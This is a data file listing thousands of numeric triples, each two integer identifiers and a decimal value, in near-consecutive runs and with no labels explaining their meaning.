(178, 223204, 1.02662),
(178, 223205, 2.14662),
(178, 223206, 1.16669),
(178, 223207, 1.30669),
(178, 223208, 1.00331),
(178, 223209, 1.14331),
(178, 223210, 0.91),
(178, 223211, 1.02669),
(178, 223212, 1.02669),
(178, 223213, 1.09669),
(178, 223214, 1.05),
(178, 223215, 1.14331),
(178, 223216, 1.00331),
(178, 223217, 1.07331),
(178, 223218, 0.32669),
(178, 223219, 0.93331),
(178, 223220, 1.02669),
(178, 223238, 1.02669),
(178, 223239, 1.12),
(263, 227911, 0.91),
(269, 227911, 0.91),
(247, 229263, 0.32669),
(249, 229263, 2.98688),
(247, 229267, 0.28),
(248, 229267, 0.56),
(264, 232240, 1.00331),
(270, 232240, 1.00331),
(301, 232240, 1.00331),
(248, 233831, 1.02669),
(269, 233831, 1.02669),
(193, 239544, 0.91),
(193, 239545, 1.00331),
(193, 239546, 0.37331),
(193, 239547, 1.02669),
(193, 239548, 1.12),
(193, 239549, 0.91),
(193, 239550, 0.98),
(193, 239551, 0.88669),
(193, 239552, 1.07331),
(193, 239553, 0.32669),
(306, 239553, 0.32669),
(193, 239554, 1.00331),
(193, 239555, 1.05),
(193, 239556, 0.91),
(193, 239557, 1.05),
(193, 239558, 0.88669),
(193, 239559, 1.00331),
(193, 239560, 0.98),
(193, 239561, 1.00331),
(193, 239562, 1.09669),
(193, 239563, 1.02669),
(193, 239564, 1.09669),
(193, 239565, 1.02669),
(193, 239566, 1.12),
(193, 239567, 0.98),
(193, 239568, 0.91),
(193, 239569, 1.00331),
(193, 239570, 1.00331),
(193, 239571, 0.46669),
(193, 239572, 1.09669),
(193, 239573, 1.16669),
(193, 239574, 0.46662),
(193, 239575, 0.91),
(193, 239576, 1.05),
(193, 239577, 0.91),
(193, 239578, 1.02669),
(193, 239579, 1.07331),
(193, 239580, 1.12),
(193, 239581, 1.05),
(193, 239582, 1.09669),
(193, 239583, 0.95669),
(288, 239583, 0.95669),
(193, 239584, 1.07331),
(193, 239585, 1.09669),
(193, 239586, 1.00331),
(193, 239587, 0.95669),
(193, 239588, 1.21331),
(193, 239589, 1.21331),
(193, 239590, 1.02669),
(193, 239591, 0.91),
(193, 239592, 1.00331),
(193, 239593, 1.05),
(193, 239594, 1.16669),
(193, 239595, 0.91),
(193, 239596, 0.98),
(193, 239597, 1.00331),
(193, 239598, 0.98),
(193, 239599, 0.84),
(269, 239599, 0.84),
(304, 239599, 0.84),
(193, 239600, 1.00331),
(193, 239601, 1.00331),
(193, 239602, 0.98),
(193, 239603, 1.23669),
(193, 239604, 1.00331),
(193, 239605, 1.19),
(193, 239606, 1.02669),
(193, 239607, 1.30669),
(193, 239608, 1.12),
(193, 239609, 1.02669),
(193, 239610, 2.1),
(193, 239611, 1.05),
(193, 239612, 0.91),
(193, 239613, 1.00331),
(193, 239614, 0.91),
(193, 239615, 1.07331),
(193, 239616, 0.32669),
(193, 239617, 0.95669),
(193, 239618, 1.14331),
(268, 247990, 0.98),
(275, 247990, 0.98),
(270, 250707, 0.95669),
(301, 250707, 0.95669),
(270, 250708, 1.09669),
(301, 250708, 1.09669),
(270, 250709, 1.07331),
(301, 250709, 1.07331),
(270, 250710, 0.84),
(274, 250710, 0.84),
(301, 250710, 0.84),
(270, 250711, 0.98),
(301, 250711, 0.98),
(270, 250712, 1.09669),
(301, 250712, 1.09669),
(270, 250713, 0.95669),
(301, 250713, 0.95669),
(270, 250714, 1.14331),
(301, 250714, 1.14331),
(265, 251375, 0.18669),
(266, 251375, 0.18669),
(265, 251376, 0.93331),
(266, 251376, 0.93331),
(265, 251377, 1.00331),
(266, 251377, 1.00331),
(265, 251378, 0.86331),
(266, 251378, 0.86331),
(265, 251379, 0.95669),
(266, 251379, 0.95669),
(265, 251380, 1.09669),
(266, 251380, 1.09669),
(265, 251381, 1.96),
(266, 251381, 1.96),
(265, 251382, 0.88669),
(266, 251382, 0.88669),
(265, 251383, 0.95669),
(266, 251383, 0.95669),
(265, 251384, 1.09669),
(266, 251384, 1.09669),
(265, 251385, 1.00331),
(266, 251385, 1.00331),
(265, 251386, 1.02669),
(266, 251386, 1.02669),
(265, 251387, 0.91),
(266, 251387, 0.91),
(265, 251388, 1.05),
(266, 251388, 1.05),
(265, 251389, 0.93331),
(266, 251389, 0.93331),
(265, 251390, 1.23669),
(266, 251390, 1.23669),
(265, 251391, 0.95669),
(266, 251391, 0.95669),
(265, 251392, 1.12),
(266, 251392, 1.12),
(265, 251393, 1.14331),
(266, 251393, 1.14331),
(265, 251394, 0.88669),
(266, 251394, 0.88669),
(265, 251395, 0.95669),
(266, 251395, 0.95669),
(265, 251396, 1.14331),
(266, 251396, 1.14331),
(265, 251397, 1.12),
(266, 251397, 1.12),
(265, 251398, 0.95669),
(266, 251398, 0.95669),
(265, 251399, 1.16669),
(266, 251399, 1.16669),
(265, 251400, 1.07331),
(266, 251400, 1.07331),
(265, 251401, 0.95669),
(266, 251401, 0.95669),
(265, 251402, 0.86331),
(266, 251402, 0.86331),
(265, 251403, 1.05),
(266, 251403, 1.05),
(265, 251404, 0.88669),
(266, 251404, 0.88669),
(265, 251405, 0.95669),
(266, 251405, 0.95669),
(265, 251406, 0.95669),
(266, 251406, 0.95669),
(265, 251407, 1.07331),
(266, 251407, 1.07331),
(265, 251408, 0.91),
(266, 251408, 0.91),
(265, 251409, 1.00331),
(266, 251409, 1.00331),
(265, 251410, 1.00331),
(266, 251410, 1.00331),
(265, 251411, 0.93331),
(266, 251411, 0.93331),
(265, 251412, 1.14331),
(266, 251412, 1.14331),
(265, 251413, 1.00331),
(266, 251413, 1.00331),
(265, 251414, 1.09669),
(266, 251414, 1.09669),
(265, 251415, 0.98),
(266, 251415, 0.98),
(265, 251416, 1.05),
(266, 251416, 1.05),
(265, 251417, 0.88669),
(266, 251417, 0.88669),
(265, 251418, 1.00331),
(266, 251418, 1.00331),
(272, 253640, 0.98),
(280, 253640, 0.98),
(272, 253641, 0.28),
(280, 253641, 0.28),
(272, 253642, 1.07331),
(280, 253642, 1.07331),
(272, 253643, 1.19),
(280, 253643, 1.19),
(272, 253644, 0.88669),
(280, 253644, 0.88669),
(272, 253645, 1.00331),
(280, 253645, 1.00331),
(272, 253646, 0.86331),
(280, 253646, 0.86331),
(272, 253647, 0.95669),
(280, 253647, 0.95669),
(272, 253648, 1.05),
(280, 253648, 1.05),
(272, 253649, 1.16669),
(280, 253649, 1.16669),
(272, 253650, 1.07331),
(280, 253650, 1.07331),
(272, 253651, 1.05),
(280, 253651, 1.05),
(272, 253652, 0.91),
(274, 253652, 0.91),
(280, 253652, 0.91),
(272, 253653, 1.07331),
(280, 253653, 1.07331),
(272, 253654, 1.09669),
(280, 253654, 1.09669),
(272, 253655, 1.14331),
(280, 253655, 1.14331),
(272, 253656, 0.84),
(280, 253656, 0.84),
(272, 253657, 0.93331),
(280, 253657, 0.93331),
(272, 253658, 1.12),
(280, 253658, 1.12),
(272, 253659, 0.98),
(280, 253659, 0.98),
(272, 253660, 1.02669),
(280, 253660, 1.02669),
(272, 253661, 1.12),
(280, 253661, 1.12),
(272, 253662, 1.23669),
(280, 253662, 1.23669),
(272, 253663, 1.00331),
(280, 253663, 1.00331),
(272, 253664, 1.16669),
(280, 253664, 1.16669),
(272, 253665, 1.00331),
(280, 253665, 1.00331),
(272, 253666, 1.26),
(280, 253666, 1.26),
(273, 256552, 0.86331),
(306, 256552, 0.86331),
(273, 256553, 1.00331),
(273, 256554, 0.91),
(273, 256555, 1.14331),
(273, 256556, 0.84),
(273, 256557, 0.93331),
(273, 256558, 0.86331),
(273, 256559, 0.93331),
(273, 256560, 4.44323),
(273, 256561, 4.85677),
(273, 256562, 1.02669),
(273, 256563, 1.14331),
(273, 256564, 1.86662),
(273, 256565, 1.02669),
(273, 256566, 1.09669),
(273, 256567, 0.95669),
(273, 256568, 1.05),
(273, 256569, 0.93331),
(273, 256570, 1.02669),
(273, 256571, 0.88669),
(273, 256572, 0.98),
(273, 256573, 0.23331),
(292, 256573, 0.23331),
(273, 256574, 0.93331),
(273, 256575, 1.05),
(273, 256576, 0.86331),
(273, 256577, 1.12),
(273, 256578, 1.02669),
(273, 256579, 1.05),
(273, 256580, 1.14331),
(273, 256581, 0.91),
(305, 256581, 0.91),
(273, 256582, 1.05),
(273, 256583, 0.95669),
(273, 256584, 1.07331),
(273, 256585, 0.42),
(292, 256585, 0.42),
(273, 256586, 1.00331),
(273, 256587, 1.09669),
(273, 256588, 0.88669),
(273, 256589, 0.95669),
(273, 256590, 0.95669),
(233, 266696, 1.05),
(233, 266697, 1.00331),
(235, 268112, 0.98),
(235, 268113, 0.98),
(235, 268114, 1.05),
(235, 268115, 1.12),
(235, 268116, 1.05),
(235, 268117, 1.07331),
(235, 268118, 0.88669),
(235, 268119, 0.98),
(235, 268120, 1.05),
(235, 268121, 1.19),
(235, 268122, 0.32669),
(235, 268123, 0.93331),
(235, 268124, 1.07331),
(235, 268125, 0.88669),
(235, 268126, 0.98),
(235, 268127, 0.88669),
(235, 268128, 1.00331),
(235, 268129, 1.00331),
(235, 268130, 0.98),
(235, 268131, 1.00331),
(292, 268131, 1.00331),
(235, 268132, 1.05),
(235, 268133, 1.12),
(235, 268134, 0.93331),
(235, 268135, 0.98),
(235, 268136, 0.86331),
(292, 268136, 0.86331),
(235, 268137, 1.02669),
(235, 268138, 0.95669),
(235, 268139, 1.09669),
(235, 268140, 0.93331),
(235, 268141, 1.05),
(235, 268142, 1.02669),
(235, 268143, 1.16669),
(235, 268144, 1.12),
(235, 268145, 0.91),
(235, 268146, 1.07331),
(235, 268147, 1.21331),
(235, 268148, 1.07331),
(235, 268149, 1.07331),
(235, 268150, 0.91),
(235, 268151, 1.23669),
(235, 268152, 1.05),
(235, 268153, 1.28331),
(235, 268154, 0.98),
(235, 268155, 1.00331),
(235, 268156, 1.09669),
(235, 268157, 0.88669),
(235, 268158, 1.07331),
(235, 268159, 0.32669),
(235, 268160, 0.93331),
(235, 268161, 1.02669),
(236, 269281, 0.86331),
(236, 269282, 0.93331),
(236, 269283, 0.91),
(236, 269284, 0.86331),
(236, 269285, 0.95669),
(236, 269286, 0.88669),
(236, 269287, 0.98),
(236, 269288, 0.91),
(236, 269289, 1.00331),
(236, 269290, 1.07331),
(236, 269291, 1.12),
(236, 269292, 1.05),
(236, 269293, 0.95669),
(236, 269294, 1.05),
(236, 269295, 0.88669),
(236, 269296, 0.95669),
(236, 269297, 0.93331),
(236, 269298, 1.07331),
(236, 269299, 0.46669),
(236, 269300, 1.02669),
(236, 269301, 1.23669),
(236, 269302, 1.02669),
(236, 269303, 1.02669),
(236, 269304, 0.98),
(236, 269305, 1.05),
(236, 269306, 1.07331),
(236, 269307, 0.98),
(236, 269308, 1.21331),
(236, 269309, 1.4),
(236, 269310, 0.95669),
(290, 269310, 0.95669),
(236, 269311, 1.02669),
(236, 269312, 1.07331),
(236, 269313, 0.98),
(236, 269314, 1.05),
(236, 269327, 0.18669),
(236, 269328, 0.86331),
(236, 269329, 0.95669),
(237, 269874, 3.08007),
(237, 269875, 0.84),
(237, 269876, 1.00331),
(237, 269877, 1.00331),
(237, 269878, 1.07331),
(237, 269879, 1.00331),
(306, 269879, 1.00331),
(237, 269880, 1.12),
(237, 269881, 0.98),
(237, 269882, 0.98),
(237, 269883, 1.19),
(237, 269884, 1.02669),
(237, 269885, 0.91),
(237, 269886, 0.98),
(237, 269887, 1.00331),
(237, 269888, 1.14331),
(237, 269889, 0.93331),
(237, 269890, 1.86662),
(237, 269891, 2.1),
(237, 269892, 0.42),
(237, 269893, 1.05),
(237, 269894, 1.23669),
(237, 269895, 1.09669),
(237, 269896, 1.86662),
(237, 269897, 2.05338),
(237, 269898, 0.88669),
(237, 269899, 1.09669),
(237, 269900, 1.09669),
(237, 269901, 0.91),
(237, 269902, 0.98),
(237, 269903, 0.23331),
(237, 269904, 0.98),
(237, 269905, 1.14331),
(237, 269906, 0.98),
(237, 269907, 1.09669),
(237, 269908, 1.05),
(237, 269909, 1.12),
(238, 271527, 0.98),
(238, 271528, 0.95669),
(238, 271529, 1.05),
(238, 271530, 1.00331),
(238, 271531, 1.00331),
(238, 271532, 1.14331),
(238, 271533, 1.00331),
(238, 271534, 0.88669),
(238, 271535, 1.00331),
(238, 271536, 1.00331),
(238, 271537, 1.14331),
(238, 271538, 1.02669),
(238, 271539, 0.95669),
(238, 271540, 1.12),
(238, 271541, 0.98),
(238, 271542, 1.09669),
(238, 271543, 0.86331),
(238, 271544, 0.93331),
(238, 271545, 0.91),
(238, 271546, 1.00331),
(238, 271547, 0.69993),
(238, 271548, 1.00331),
(238, 271549, 1.14331),
(238, 271550, 0.88669),
(238, 271551, 0.98),
(238, 271552, 0.93331),
(238, 271553, 1.02669),
(238, 271554, 1.05),
(238, 271555, 0.98),
(238, 271556, 0.88669),
(238, 271557, 0.98),
(238, 271558, 0.88669),
(238, 271559, 1.09669),
(238, 271560, 0.91),
(238, 271561, 1.00331),
(238, 271562, 1.02669),
(238, 271563, 1.23669),
(238, 271564, 1.02669),
(238, 271565, 1.09669),
(238, 271566, 0.91),
(238, 271567, 1.05),
(238, 271568, 1.05),
(238, 271569, 1.16669),
(238, 271570, 1.14331),
(238, 271571, 1.02669),
(238, 271572, 0.93331),
(238, 271573, 1.14331),
(238, 271574, 1.00331),
(238, 271575, 1.21331),
(238, 271576, 1.00331),
(238, 271577, 0.95669),
(238, 271578, 0.95669),
(238, 271579, 1.16669),
(238, 271580, 1.05),
(238, 271581, 1.12),
(238, 271582, 1.82),
(238, 271583, 1.12),
(238, 271584, 1.07331),
(238, 271585, 1.05),
(238, 271586, 1.12),
(238, 271587, 0.98),
(238, 271588, 1.12),
(238, 271589, 1.07331),
(238, 271590, 0.98),
(238, 271591, 1.02669),
(238, 271592, 0.37331),
(238, 271593, 1.07331),
(238, 271594, 1.14331),
(238, 271595, 0.95669),
(238, 271596, 1.12),
(238, 271597, 1.02669),
(238, 271598, 0.98),
(239, 273749, 0.95669),
(239, 273750, 0.86331),
(239, 273751, 0.93331),
(239, 273752, 0.86331),
(239, 273753, 0.95669),
(239, 273754, 0.84),
(239, 273755, 0.93331),
(239, 273756, 0.93331),
(239, 273757, 1.09669),
(239, 273758, 1.00331),
(239, 273759, 1.09669),
(239, 273760, 0.93331),
(239, 273761, 1.00331),
(239, 273762, 1.12),
(239, 273763, 0.88669),
(239, 273764, 0.98),
(239, 273765, 0.98),
(239, 273766, 0.98),
(239, 273767, 0.98),
(239, 273768, 1.07331),
(239, 273769, 1.00331),
(239, 273770, 1.09669),
(239, 273771, 0.88669),
(239, 273772, 0.95669),
(239, 273773, 0.37331),
(239, 273774, 0.98),
(239, 273775, 1.09669),
(239, 273776, 1.14331),
(239, 273777, 0.18669),
(239, 273778, 0.91),
(239, 273779, 0.98),
(239, 273780, 1.09669),
(239, 273781, 0.28),
(239, 273782, 1.07331),
(239, 273783, 1.14331),
(239, 273784, 0.86331),
(292, 273784, 0.86331),
(239, 273785, 1.00331),
(239, 273786, 1.00331),
(239, 273787, 1.14331),
(239, 273788, 1.02669),
(239, 273789, 0.95669),
(239, 273790, 0.95669),
(239, 273791, 1.00331),
(239, 273792, 0.88669),
(239, 273793, 0.98),
(239, 273794, 0.93331),
(239, 273795, 0.46669),
(239, 273796, 1.16669),
(239, 273797, 1.23669),
(239, 273798, 0.91),
(239, 273799, 1.00331),
(239, 273800, 0.88669),
(239, 273801, 1.05),
(239, 273802, 1.09669),
(239, 273803, 1.00331),
(239, 273804, 0.91),
(239, 273805, 0.95669),
(239, 273806, 1.00331),
(239, 273807, 1.12),
(239, 273808, 1.05),
(239, 273809, 1.16669),
(239, 273810, 1.14331),
(239, 273811, 1.23669),
(239, 273812, 0.93331),
(239, 273813, 1.07331),
(239, 273814, 0.86331),
(304, 273814, 0.86331),
(239, 273815, 0.98),
(239, 273816, 0.98),
(239, 273817, 1.07331),
(239, 273818, 1.05),
(239, 273819, 0.98),
(239, 273820, 1.07331),
(239, 273821, 0.93331),
(239, 273822, 1.00331),
(239, 273823, 0.93331),
(239, 273824, 1.00331),
(239, 273825, 0.88669),
(239, 273826, 1.05),
(239, 273827, 0.93331),
(239, 273828, 1.05),
(240, 275990, 0.18669),
(240, 275991, 0.86331),
(240, 275992, 0.93331),
(240, 275993, 1.00331),
(240, 275994, 1.00331),
(240, 275995, 1.00331),
(240, 275996, 1.07331),
(240, 275997, 1.14331),
(240, 275998, 0.84),
(240, 275999, 1.00331),
(240, 276000, 1.30676),
(240, 276001, 1.05),
(240, 276002, 1.14331),
(240, 276003, 1.02669),
(240, 276004, 1.12),
(240, 276005, 1.07331),
(240, 276006, 1.16669),
(240, 276007, 0.95669),
(240, 276008, 1.05),
(240, 276009, 0.91),
(240, 276010, 1.19),
(240, 276011, 1.00331),
(240, 276012, 0.95669),
(240, 276013, 0.91),
(240, 276014, 0.81669),
(240, 276015, 1.07331),
(240, 276016, 1.05),
(240, 276017, 0.86331),
(240, 276018, 0.98),
(240, 276019, 1.00331),
(240, 276020, 0.84),
(240, 276021, 0.91),
(240, 276022, 0.88669),
(240, 276023, 0.95669),
(240, 276024, 0.93331),
(240, 276025, 1.00331),
(240, 276026, 0.93331),
(240, 276027, 1.12),
(240, 276028, 0.93331),
(240, 276029, 1.00331),
(240, 276030, 1.05),
(240, 276031, 0.91),
(240, 276032, 1.02669),
(240, 276033, 1.02669),
(240, 276034, 1.12),
(240, 276035, 0.98),
(240, 276036, 1.02669),
(240, 276037, 1.00331),
(240, 276038, 1.02669),
(240, 276039, 0.37331),
(240, 276040, 1.00331),
(240, 276041, 1.12),
(240, 276042, 1.12),
(240, 276043, 1.26),
(240, 276044, 1.05),
(240, 276045, 0.88669),
(240, 276046, 1.02669),
(240, 276047, 1.86662),
(240, 276048, 1.91338),
(240, 276049, 1.07331),
(240, 276050, 1.07331),
(240, 276051, 0.88669),
(288, 276051, 0.88669),
(240, 276052, 1.02669),
(240, 276053, 1.02669),
(240, 276054, 1.77338),
(240, 276055, 0.98),
(240, 276056, 0.98),
(240, 276057, 0.65331),
(240, 276058, 1.26),
(240, 276059, 1.4),
(240, 276060, 0.93331),
(240, 276061, 1.02669),
(240, 276062, 0.88669),
(240, 276063, 1.12),
(240, 276064, 0.91),
(240, 276065, 1.00331),
(240, 276066, 1.86662),
(240, 276067, 1.21331),
(240, 276068, 1.26),
(240, 276069, 1.00331),
(240, 276070, 1.28331),
(240, 276071, 1.07331),
(240, 276072, 1.21331),
(240, 276073, 0.98),
(240, 276074, 0.86331),
(240, 276075, 0.95669),
(240, 276076, 1.12),
(240, 276077, 1.02669),
(240, 276078, 0.42),
(292, 276078, 0.42),
(240, 276079, 0.98),
(240, 276080, 1.09669),
(240, 276081, 0.88669),
(240, 276082, 1.02669),
(240, 276083, 0.88669),
(240, 276084, 1.02669),
(240, 276085, 0.98),
(240, 276086, 1.07331),
(240, 276087, 0.91),
(240, 276088, 0.98),
(240, 276089, 0.95669),
(240, 276090, 0.98),
(292, 276091, 0.98),
(240, 276091, 1.96),
(292, 276092, 1.07331),
(240, 276092, 2.14662),
(240, 276093, 0.95669),
(240, 276094, 1.02669),
(240, 276095, 0.95669),
(240, 276096, 1.05),
(240, 276097, 0.95669),
(240, 276098, 0.32669),
(288, 276098, 0.32669),
(240, 276099, 1.05),
(240, 276100, 1.4),
(241, 277297, 1.02669),
(241, 277298, 0.98),
(241, 277299, 1.05),
(241, 277300, 0.91),
(241, 277301, 1.05),
(241, 277302, 0.88669),
(241, 277303, 1.02669),
(241, 277304, 1.96),
(241, 277305, 0.88669),
(241, 277306, 0.98),
(241, 277307, 1.05),
(241, 277308, 0.95669),
(241, 277309, 1.07331),
(241, 277310, 1.00331),
(241, 277311, 1.00331),
(241, 277312, 0.88669),
(241, 277313, 1.09669),
(241, 277314, 1.00331),
(241, 277315, 1.07331),
(241, 277316, 1.02669),
(241, 277317, 1.12),
(241, 277318, 0.91),
(241, 277319, 0.98),
(241, 277320, 0.98),
(241, 277321, 1.12),
(241, 277322, 0.88669),
(241, 277323, 0.98),
(241, 277324, 1.05),
(241, 277325, 1.16669),
(241, 277326, 1.14331),
(241, 277327, 0.91),
(241, 277328, 0.98),
(241, 277329, 1.02669),
(241, 277330, 1.02669),
(241, 277331, 0.98),
(241, 277332, 0.91),
(241, 277333, 1.00331),
(241, 277334, 1.96),
(241, 277335, 2.00662),
(241, 277336, 0.98),
(241, 277337, 1.72662),
(241, 277338, 1.02669),
(241, 277339, 0.98),
(241, 277340, 1.02669),
(241, 277341, 1.96),
(241, 277342, 1.00331),
(241, 277343, 0.93331),
(241, 277344, 1.05),
(241, 277345, 0.88669),
(241, 277346, 1.00331),
(241, 277347, 0.88669),
(241, 277348, 1.00331),
(241, 277349, 0.88669),
(241, 277350, 1.00331),
(241, 277351, 1.00331),
(241, 277352, 1.12),
(241, 277353, 0.88669),
(241, 277354, 0.98),
(241, 277355, 0.91),
(241, 277356, 0.98),
(241, 277357, 0.98),
(241, 277358, 0.93331),
(241, 277359, 1.00331),
(241, 277407, 0.88669),
(241, 277408, 0.95669),
(242, 279528, 0.42),
(242, 279529, 1.09669),
(242, 279530, 1.26),
(243, 282672, 0.98),
(243, 282673, 1.12),
(243, 282674, 0.37331),
(243, 282675, 1.00331),
(243, 282676, 1.14331),
(243, 282677, 0.32669),
(243, 282678, 0.95669),
(243, 282679, 1.02669),
(243, 282680, 0.91),
(306, 282680, 0.91),
(243, 282681, 0.98),
(306, 282681, 0.98),
(243, 282682, 0.95669),
(243, 282683, 1.07331),
(243, 282684, 0.91),
(243, 282685, 0.98),
(243, 282686, 1.07331),
(243, 282687, 1.28331),
(243, 282688, 1.05),
(243, 282689, 1.05),
(243, 282690, 0.93331),
(243, 282691, 1.12),
(243, 282692, 0.95669),
(243, 282693, 1.02669),
(243, 282694, 0.91),
(292, 282694, 0.91),
(243, 282695, 0.98),
(243, 282696, 0.95669),
(243, 282697, 1.05),
(243, 282698, 0.95669),
(243, 282699, 1.09669),
(243, 282700, 0.95669),
(243, 282701, 0.98),
(243, 282702, 1.05),
(243, 282703, 0.91),
(243, 282704, 1.00331),
(243, 282705, 0.95669),
(288, 282705, 0.95669),
(243, 282706, 1.14331),
(243, 282707, 0.98),
(243, 282708, 0.91),
(243, 282709, 1.02669),
(243, 282710, 0.91),
(243, 282711, 1.16669),
(243, 282712, 0.95669),
(304, 282712, 0.95669),
(243, 282713, 0.98),
(243, 282714, 0.88669),
(243, 282715, 1.07331),
(243, 282716, 0.98),
(243, 282717, 0.91),
(243, 282718, 0.95669),
(243, 282719, 0.98),
(243, 282720, 1.07331),
(243, 282721, 0.95669),
(243, 282722, 1.05),
(243, 282723, 1.00331),
(243, 282724, 1.09669),
(244, 284452, 0.98),
(244, 284453, 1.09669),
(244, 284454, 0.98),
(244, 284455, 0.88669),
(244, 284456, 0.95669),
(244, 284457, 0.98),
(244, 284458, 0.95669),
(244, 284459, 1.02669),
(244, 284460, 0.91),
(244, 284461, 0.98),
(244, 284462, 0.98),
(244, 284463, 1.14331),
(244, 284464, 1.00331),
(244, 284465, 0.98),
(244, 284466, 1.07331),
(244, 284467, 2.73),
(244, 284468, 1.07331),
(244, 284469, 1.02669),
(244, 284470, 1.02669),
(244, 284471, 0.93331),
(244, 284472, 1.02669),
(244, 284473, 0.32669),
(244, 284474, 0.93331),
(244, 284475, 1.02669),
(244, 284476, 0.88669),
(244, 284477, 1.05),
(244, 284478, 0.95669),
(244, 284479, 0.98),
(244, 284480, 1.00331),
(244, 284481, 1.00331),
(244, 284482, 0.93331),
(305, 284482, 0.93331),
(244, 284483, 1.07331),
(244, 284484, 0.88669),
(244, 284485, 1.07331),
(244, 284486, 0.46669),
(244, 284487, 1.00331),
(244, 284488, 1.21331),
(244, 284489, 0.95669),
(244, 284490, 1.02669),
(244, 284491, 0.14),
(244, 284492, 0.88669),
(244, 284493, 1.07331),
(244, 284494, 0.95669),
(244, 284495, 1.07331),
(245, 285138, 0.95669),
(245, 285139, 0.93331),
(245, 285140, 1.82),
(245, 285141, 0.95669),
(245, 285142, 1.07331),
(245, 285143, 0.93331),
(245, 285144, 1.07331),
(245, 285145, 0.91),
(245, 285146, 0.98),
(245, 285147, 1.00331),
(245, 285148, 1.07331),
(245, 285149, 8.53312),
(245, 285150, 10.4531),
(245, 285151, 1.00331),
(245, 285152, 0.91),
(245, 285153, 1.02669),
(245, 285154, 1.00331),
(245, 285155, 0.95669),
(245, 285156, 1.09669),
(245, 285157, 0.91),
(245, 285158, 1.05),
(246, 285900, 1.00331),
(246, 285901, 0.91),
(246, 285902, 1.00331),
(246, 285903, 0.93331),
(246, 285904, 1.05),
(246, 285905, 0.81669),
(246, 285906, 0.88669),
(246, 285907, 1.07331),
(246, 285908, 1.00331),
(246, 285909, 1.09669),
(246, 285910, 0.93331),
(246, 285911, 1.09669),
(246, 285912, 0.91),
(246, 285913, 0.98),
(246, 285914, 1.05),
(246, 285915, 0.93331),
(246, 285916, 1.16669),
(246, 285917, 1.09669),
(246, 285918, 0.93331),
(246, 285919, 1.00331),
(246, 285920, 1.02669),
(246, 285921, 1.05),
(246, 285922, 1.07331),
(246, 285923, 1.02669),
(246, 285924, 1.02669),
(246, 285925, 0.95669),
(246, 285926, 0.88669),
(246, 285927, 1.96),
(246, 285928, 0.88669),
(246, 285929, 0.98),
(246, 285930, 0.98),
(246, 285931, 1.05),
(246, 285932, 1.07331),
(246, 285933, 0.91),
(246, 285934, 1.00331),
(246, 285935, 1.00331),
(246, 285936, 0.98),
(246, 285937, 0.88669),
(305, 285937, 0.88669),
(246, 285938, 1.00331),
(246, 285939, 1.00331),
(246, 285940, 1.02669),
(246, 285941, 1.09669),
(247, 286798, 1.09669),
(247, 286799, 1.16669),
(247, 286800, 0.93331),
(247, 286801, 1.09669),
(247, 286802, 0.93331),
(247, 286803, 0.86331),
(247, 286804, 0.91),
(247, 286805, 0.81669),
(247, 286806, 0.98),
(247, 286807, 0.46662),
(247, 286808, 0.91),
(247, 286809, 1.02669),
(247, 286810, 1.02669),
(247, 286811, 1.09669),
(247, 286812, 0.37331),
(247, 286813, 0.98),
(247, 286814, 1.16669),
(247, 286815, 1.02669),
(247, 286816, 1.23669),
(247, 286817, 1.05),
(247, 286818, 1.02669),
(247, 286819, 1.09669),
(247, 286820, 1.14331),
(247, 286821, 1.19),
(247, 286822, 1.02669),
(247, 286823, 1.12),
(247, 286824, 0.95669),
(247, 286825, 0.93331),
(247, 286826, 0.98),
(247, 286827, 0.93331),
(247, 286828, 1.02669),
(248, 287780, 0.95669),
(248, 287781, 1.02669),
(248, 287782, 0.91),
(248, 287783, 0.95669),
(248, 287784, 0.98),
(248, 287785, 1.07331),
(248, 287786, 0.93331),
(248, 287787, 0.93331),
(248, 287788, 1.02669),
(248, 287789, 1.09669),
(248, 287790, 1.02669),
(248, 287791, 0.37331),
(248, 287792, 1.14331),
(248, 287793, 1.33),
(248, 287794, 0.88669),
(248, 287795, 0.98),
(248, 287796, 0.95669),
(248, 287797, 1.07331),
(248, 287798, 1.00331),
(248, 287799, 1.09669),
(248, 287800, 7.79019),
(248, 287801, 9.50019),
(248, 287802, 1.00331),
(248, 287803, 1.19),
(248, 287804, 1.35331),
(248, 287805, 1.05),
(248, 287806, 1.19),
(248, 287807, 1.09669),
(248, 287808, 1.07331),
(248, 287809, 1.12),
(248, 287810, 0.93331),
(290, 287810, 0.93331),
(248, 287811, 1.02669),
(248, 287812, 0.98),
(248, 287813, 1.16669),
(248, 287814, 0.98),
(248, 287815, 0.91),
(248, 287816, 1.05),
(248, 287817, 0.95669),
(248, 287818, 1.05),
(248, 287819, 1.05),
(248, 287820, 1.14331),
(249, 288813, 0.28),
(249, 288814, 0.88669),
(249, 288815, 1.07331),
(249, 288816, 0.95669),
(249, 288817, 1.02669),
(249, 288818, 0.84),
(249, 288819, 1.00331),
(249, 288820, 0.98),
(249, 288821, 1.05),
(249, 288822, 0.88669),
(249, 288823, 1.02669),
(249, 288824, 0.91),
(249, 288825, 1.09669),
(249, 288826, 1.05),
(249, 288827, 1.14331),
(249, 288828, 0.95669),
(249, 288829, 1.05),
(249, 288830, 0.93331),
(249, 288831, 1.07331),
(249, 288832, 0.98),
(249, 288833, 1.05),
(249, 288834, 1.07331),
(249, 288835, 1.12),
(249, 288836, 3.28008),
(249, 288837, 3.84),
(249, 288838, 2.15339),
(249, 288839, 2.49339),
(249, 288840, 0.93331),
(249, 288841, 1.00331),
(249, 288842, 0.91),
(249, 288843, 1.05),
(249, 288844, 0.93331),
(249, 288845, 1.05),
(249, 288846, 1.02669),
(305, 288846, 1.02669),
(249, 288847, 0.91),
(249, 288848, 0.98),
(249, 288849, 0.84),
(249, 288850, 0.93331),
(249, 288851, 1.07331),
(249, 288852, 0.88669),
(249, 288853, 0.98),
(249, 288854, 1.00331),
(249, 288855, 1.05),
(249, 288856, 1.96),
(249, 288857, 1.07331),
(249, 288858, 1.05),
(249, 288859, 0.46669),
(249, 288860, 1.12),
(249, 288861, 1.21331),
(249, 288862, 0.95669),
(249, 288863, 1.05),
(251, 289488, 0.37338),
(251, 289489, 0.95669),
(251, 289490, 1.09669),
(251, 289491, 0.88669),
(251, 289492, 1.05),
(251, 289493, 0.23331),
(251, 289494, 0.91),
(251, 289495, 1.07331),
(252, 290024, 1.05),
(252, 290025, 1.02669),
(252, 290026, 1.07331),
(252, 290027, 1.00331),
(252, 290028, 0.98),
(252, 290029, 1.07331),
(252, 290030, 1.12),
(252, 290031, 1.16669),
(252, 290032, 1.00331),
(252, 290033, 1.14331),
(252, 290034, 0.95669),
(252, 290035, 1.02669),
(306, 290035, 1.02669),
(252, 290036, 1.02669),
(252, 290037, 1.09669),
(252, 290038, 1.96),
